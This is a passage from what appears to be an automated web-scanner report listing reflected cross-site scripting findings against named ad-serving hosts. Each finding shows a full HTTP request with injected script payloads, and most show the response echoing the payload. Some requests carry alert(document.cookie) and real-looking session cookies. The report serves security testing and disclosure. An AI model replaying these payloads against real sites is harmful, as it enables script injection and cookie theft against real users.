<pre>Resource /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre>
...[SNIP]...

4.462. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 392f3<script>alert(1)</script>219f978c563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:58 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj not found</pre>
<BR>

4.463. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0304<script>alert(1)</script>eba54b6ea1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:57 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj not found</pre>
<BR>

4.464. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16fb7<script>alert(1)</script>adc248a20be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:10 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre>
...[SNIP]...

4.465. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b5ec<script>alert(1)</script>60ca2fa0c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:10 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre>
...[SNIP]...

4.466. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61456<script>alert(1)</script>bd4d5cb3b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:42:09 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj not found</pre>
<BR>

4.467. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab38f<script>alert(1)</script>fdc76c91cde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:42:09 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj not found</pre>
<BR>

4.468. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bfba<script>alert(1)</script>20f5747086d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:26:47 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre>
...[SNIP]...

4.469. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82c11<script>alert(1)</script>7831f1e4291 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:26:48 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre>
...[SNIP]...

4.470. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2558<script>alert(1)</script>78040661ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:06 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj not found</pre>
<BR>

4.471. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8bcf<script>alert(1)</script>3fa33f2659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj not found</pre>
<BR>

4.472. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fece'-alert(1)-'9f941c34489 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.2fece'-alert(1)-'9f941c34489&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

4.473. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c05'%3balert(1)//97aa36e20df was submitted in the redir parameter. This input was echoed as 71c05';alert(1)//97aa36e20df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F71c05'%3balert(1)//97aa36e20df HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

4.474. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbd33"%3balert(1)//051cb26d260 was submitted in the mpck parameter. This input was echoed as dbd33";alert(1)//051cb26d260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213dbd33"%3balert(1)//051cb26d260&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:43 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6659
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-1?mpt=3544685213dbd33";alert(1)//051cb26d260\" target=\"_blank\">
...[SNIP]...

4.475. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45d90"%3balert(1)//ae69b85476 was submitted in the mpvc parameter. This input was echoed as 45d90";alert(1)//ae69b85476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=45d90"%3balert(1)//ae69b85476&placementid=14302119028289011& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:53 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6622
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=45d90";alert(1)//ae69b85476http://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&clickTag=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,7661
...[SNIP]...

4.476. http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [placementid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/social_ponder_728x90.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca98"%3balert(1)//f842bdb5210 was submitted in the placementid parameter. This input was echoed as fca98";alert(1)//f842bdb5210 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

